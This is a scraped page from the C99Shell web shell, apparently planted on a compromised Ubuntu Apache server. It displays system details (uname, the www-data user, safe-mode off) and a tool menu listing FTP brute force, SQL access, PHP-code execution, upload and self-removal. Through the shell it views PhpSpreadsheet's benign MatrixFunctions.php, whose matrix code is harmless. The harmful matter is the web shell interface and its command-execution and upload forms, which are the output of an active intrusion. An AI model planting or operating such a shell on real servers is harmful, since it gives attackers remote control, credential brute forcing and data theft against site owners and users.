!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache/2.4.41 (Ubuntu). PHP/8.0.30 

uname -a: Linux apirnd 5.4.0-204-generic #224-Ubuntu SMP Thu Dec 5 13:38:28 UTC 2024 x86_64 

uid=33(www-data) gid=33(www-data) groups=33(www-data) 

Safe-mode: OFF (not secure)

/var/www/html/main_file/vendor/phpoffice/phpspreadsheet/src/PhpSpreadsheet/Calculation/MathTrig/   drwxr-xr-x
Free 13.12 GB of 57.97 GB (22.64%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     MatrixFunctions.php (5.18 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

namespace PhpOffice\PhpSpreadsheet\Calculation\MathTrig;

use 
Matrix\Builder;
use 
Matrix\Div0Exception as MatrixDiv0Exception;
use 
Matrix\Exception as MatrixException;
use 
Matrix\Matrix;
use 
PhpOffice\PhpSpreadsheet\Calculation\Exception;
use 
PhpOffice\PhpSpreadsheet\Calculation\Information\ExcelError;

class 
MatrixFunctions
{
    
/**
     * Convert parameter to Matrix.
     *
     * @param mixed $matrixValues A matrix of values
     */
    
private static function getMatrix($matrixValues): Matrix
    
{
        
$matrixData = [];
        if (!
is_array($matrixValues)) {
            
$matrixValues = [[$matrixValues]];
        }

        
$row 0;
        foreach (
$matrixValues as $matrixRow) {
            if (!
is_array($matrixRow)) {
                
$matrixRow = [$matrixRow];
            }
            
$column 0;
            foreach (
$matrixRow as $matrixCell) {
                if ((
is_string($matrixCell)) || ($matrixCell === null)) {
                    throw new 
Exception(ExcelError::VALUE());
                }
                
$matrixData[$row][$column] = $matrixCell;
                ++
$column;
            }
            ++
$row;
        }

        return new 
Matrix($matrixData);
    }

    
/**
     * SEQUENCE.
     *
     * Generates a list of sequential numbers in an array.
     *
     * Excel Function:
     *      SEQUENCE(rows,[columns],[start],[step])
     *
     * @param mixed $rows the number of rows to return, defaults to 1
     * @param mixed $columns the number of columns to return, defaults to 1
     * @param mixed $start the first number in the sequence, defaults to 1
     * @param mixed $step the amount to increment each subsequent value in the array, defaults to 1
     *
     * @return array|string The resulting array, or a string containing an error
     */
    
public static function sequence($rows 1$columns 1$start 1$step 1)
    {
        try {
            
$rows = (int) Helpers::validateNumericNullSubstitution($rows1);
            
Helpers::validatePositive($rows);
            
$columns = (int) Helpers::validateNumericNullSubstitution($columns1);
            
Helpers::validatePositive($columns);
            
$start Helpers::validateNumericNullSubstitution($start1);
            
$step Helpers::validateNumericNullSubstitution($step1);
        } catch (
Exception $e) {
            return 
$e->getMessage();
        }

        if (
$step === 0) {
            return 
array_chunk(
                
array_fill(0$rows $columns$start),
                
max($columns1)
            );
        }

        return 
array_chunk(
            
range($start$start + (($rows $columns 1) * $step), $step),
            
max($columns1)
        );
    }

    
/**
     * MDETERM.
     *
     * Returns the matrix determinant of an array.
     *
     * Excel Function:
     *        MDETERM(array)
     *
     * @param mixed $matrixValues A matrix of values
     *
     * @return float|string The result, or a string containing an error
     */
    
public static function determinant($matrixValues)
    {
        try {
            
$matrix self::getMatrix($matrixValues);

            return 
$matrix->determinant();
        } catch (
MatrixException $ex) {
            return 
ExcelError::VALUE();
        } catch (
Exception $e) {
            return 
$e->getMessage();
        }
    }

    
/**
     * MINVERSE.
     *
     * Returns the inverse matrix for the matrix stored in an array.
     *
     * Excel Function:
     *        MINVERSE(array)
     *
     * @param mixed $matrixValues A matrix of values
     *
     * @return array|string The result, or a string containing an error
     */
    
public static function inverse($matrixValues)
    {
        try {
            
$matrix self::getMatrix($matrixValues);

            return 
$matrix->inverse()->toArray();
        } catch (
MatrixDiv0Exception $e) {
            return 
ExcelError::NAN();
        } catch (
MatrixException $e) {
            return 
ExcelError::VALUE();
        } catch (
Exception $e) {
            return 
$e->getMessage();
        }
    }

    
/**
     * MMULT.
     *
     * @param mixed $matrixData1 A matrix of values
     * @param mixed $matrixData2 A matrix of values
     *
     * @return array|string The result, or a string containing an error
     */
    
public static function multiply($matrixData1$matrixData2)
    {
        try {
            
$matrixA self::getMatrix($matrixData1);
            
$matrixB self::getMatrix($matrixData2);

            return 
$matrixA->multiply($matrixB)->toArray();
        } catch (
MatrixException $ex) {
            return 
ExcelError::VALUE();
        } catch (
Exception $e) {
            return 
$e->getMessage();
        }
    }

    
/**
     * MUnit.
     *
     * @param mixed $dimension Number of rows and columns
     *
     * @return array|string The result, or a string containing an error
     */
    
public static function identity($dimension)
    {
        try {
            
$dimension = (int) Helpers::validateNumericNullBool($dimension);
            
Helpers::validatePositive($dimensionExcelError::VALUE());
            
$matrix Builder::createIdentityMatrix($dimension0)->toArray();

            return 
$matrix;
        } catch (
Exception $e) {
            return 
$e->getMessage();
        }
    }
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0056 ]--